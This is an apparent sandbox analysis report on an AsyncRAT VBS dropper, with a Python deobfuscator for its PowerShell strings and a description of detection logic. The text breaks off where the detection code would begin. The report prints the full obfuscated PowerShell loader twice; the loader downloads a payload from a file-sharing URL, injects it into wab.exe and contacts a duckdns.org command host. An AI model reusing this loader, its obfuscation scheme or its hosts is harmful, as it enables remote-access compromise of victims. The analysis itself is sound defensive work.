Analysis Overview
SHA256
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6
Threat Level: Known bad
The file 255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Blocklisted process makes network request
Checks computer location settings
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-24 13:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-24 13:15
Reported
2024-05-24 13:17
Platform
win7-20240508-en
Max time kernel
143s
Max time network
145s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2820 set thread context of 2300 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo 
aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) 
Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. 
Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo 
aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) 
Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. 
Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
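The PowerShell stage above is readable once its string encoding is understood. `$Benzinen` is assembled as `'Sub'+'strin'+'g'`, and `Sikkerhedspolitikken` walks each padded literal keeping only every sixth character from offset 5 (`$i -lt $s.Length - 1` also discards the final pad character). `natasjas` dot-sources `$Resultanternes`, which decodes to `iex`, so every decoded string is fed to Invoke-Expression. The Python below is an added example and not part of the sandbox report: it ports the decoder, rewrites a script so the literals become plain text, and pulls out the URLs that only exist after decoding. The four literals are copied verbatim from the command line above (`$Haandslagene` decodes to `User-Agent`, `$Funktionserklringen` to the sendspace download URL that matches the Network table below, `$Abrogators` to `>`); the decoder name is passed as a parameter on the assumption that it changes between builds. One caveat for anyone decoding the rest of this page: some of the longer literals (`$Allehelgensdag`, `$Korrektiv`) appear to have had runs of spaces collapsed by the page extraction and no longer decode cleanly here, although `$Korrektiv` corresponds to the `echo %appdata%\Absterge.Pig` cmd.exe line listed above; the four used here decode as-is.

```python
from __future__ import annotations

import re

# Port of Sikkerhedspolitikken(): of every six characters only the sixth
# (offsets 5, 11, 17, ...) is real, and the loop condition
# $i -lt ($s.Length - 1) drops the last character, always a pad space here.
STEP = 6
FIRST = 5


def deobfuscate(padded: str) -> str:
    """Return the plaintext hidden in one padded literal."""
    return "".join(padded[i] for i in range(FIRST, len(padded) - 1, STEP))


def decode_all(script: str, func_name: str = "Sikkerhedspolitikken") -> list[str]:
    """Decode every  <func_name> '<padded>'  call in a script body, in order.
    The decoder name is per-build (assumption), so it is a parameter."""
    pattern = re.compile(re.escape(func_name) + r"\s+'([^']*)'")
    return [deobfuscate(m.group(1)) for m in pattern.finditer(script)]


def inline_literals(script: str, func_name: str = "Sikkerhedspolitikken") -> str:
    """Rewrite the script with each decoder call replaced by a plain
    single-quoted PowerShell literal, so the logic can be read (never run)."""
    pattern = re.compile(re.escape(func_name) + r"\s+'([^']*)'")

    def repl(m: re.Match) -> str:
        return "'" + deobfuscate(m.group(1)).replace("'", "''") + "'"

    return pattern.sub(repl, script)


URL_RE = re.compile(r"https?://[^\s'\"]+")


def extract_urls(script: str, func_name: str = "Sikkerhedspolitikken") -> list[str]:
    """URLs that are only visible once the literals have been decoded."""
    return URL_RE.findall(inline_literals(script, func_name))


# Four literals copied verbatim from the powershell.exe command line on this page.
HAANDSLAGENE = "SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks "
RESULTANTERNES = " La.kiA,laseInsenxTaiwa "
ABROGATORS = "g.lli> Rets "
FUNKTIONSERKLRINGEN = (
    "afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac."
    "SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,tro"
    "KabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 Timet"
    "Mns rdvoicibAutorrBlokd "
)

# Constructed fragment in the shape of the real script (same variable names,
# same decoder name) used to exercise the three helpers above.
SAMPLE_FRAGMENT = (
    f"$Haandslagene=Sikkerhedspolitikken '{HAANDSLAGENE}';"
    f"$Funktionserklringen=Sikkerhedspolitikken '{FUNKTIONSERKLRINGEN}';"
    f"$Abrogators=Sikkerhedspolitikken '{ABROGATORS}';"
    f"$Resultanternes=Sikkerhedspolitikken '{RESULTANTERNES}';"
)

if __name__ == "__main__":
    for statement in inline_literals(SAMPLE_FRAGMENT).split(";"):
        if statement:
            print(statement)
    print("URLs:", extract_urls(SAMPLE_FRAGMENT))
```

To use it on the full command line, paste the text between the outer double quotes into a file and pass its contents to `inline_literals`; the result is still PowerShell, so treat it as something to read, not to execute.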
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.sendspace.com | udp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n4.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n4.sendspace.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n4.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n4.sendspace.com | tcp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
Files
memory/1976-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp
memory/1976-5-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/1976-6-0x0000000001C80000-0x0000000001C88000-memory.dmp
memory/1976-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/1976-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/1976-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/1976-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab563D.tmp
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar5640.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JQ18KB3ITWJJSPMTJK0U.temp
| MD5 | 31e946d92f43dac050f1142afdb612f2 |
| SHA1 | bc97c240fd9a57fac638e4992e1b097b1834f20f |
| SHA256 | bad1c8e64108f46e9000247fc338f5e01310338d6107bbd4bc1cd9a80dcb0e74 |
| SHA512 | 4552b752c8d562ab7dcfd13818508053fded8e87fa7046b0bb1ac3455ab78e38c5587751a27353829aa137a8acfdb09df13dae9a7e689f75c8df29052e095399 |
C:\Users\Admin\AppData\Roaming\Absterge.Pig
| MD5 | ce1f757dad7e08f32964a255a380674e |
| SHA1 | 19e38ec002272355856d0f68324c0b18a7a07dc0 |
| SHA256 | 4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548 |
| SHA512 | ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e |
memory/1976-54-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2820-55-0x0000000006580000-0x00000000074A9000-memory.dmp
memory/1976-56-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2299a6fb34550e1d3e6dd69f6fb5cbfb |
| SHA1 | 082eb4da1816d3a20d7bead043b7367b9dfcdf24 |
| SHA256 | 2d550eb29bb22df74cc499d69f71653a96b26d091276472a24023f4f2d42eb01 |
| SHA512 | 12cedad6552f192b93e81b4cb0e53b9db554be8bb3f4c209a25be50e91160a5b532bc72c6965dc49afa4ac756ae00562612a7626f30becd2c06573118666c8c0 |
memory/2300-83-0x00000000006D0000-0x0000000001732000-memory.dmp
memory/2300-84-0x00000000006D0000-0x0000000001732000-memory.dmp
memory/1976-85-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp
memory/2300-86-0x00000000006D0000-0x00000000006E6000-memory.dmp
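The signatures and process tree for this detonation describe a chain that is straightforward to express as detection logic: WScript.exe spawning powershell.exe with a multi-kilobyte obfuscated command line; PowerShell spawning cmd.exe only to `echo %appdata%\Absterge.Pig` (the drop-path lookup); the 32-bit powershell.exe (PID 2820) setting the thread context of wab.exe (PID 2300), which is how the payload ends up executing inside a signed Windows Mail binary; and a connection to a DuckDNS host on 8890/tcp. The Python below is an added example, not part of the sandbox report: it runs those checks over constructed events shaped after this report. The event dataclasses, the debugger allow-list and the dynamic-DNS suffix list are assumptions made for the example rather than the schema of any particular product; PIDs 1976, 2820 and 2300 are taken from the report, everything else in the sample events is made up.

```python
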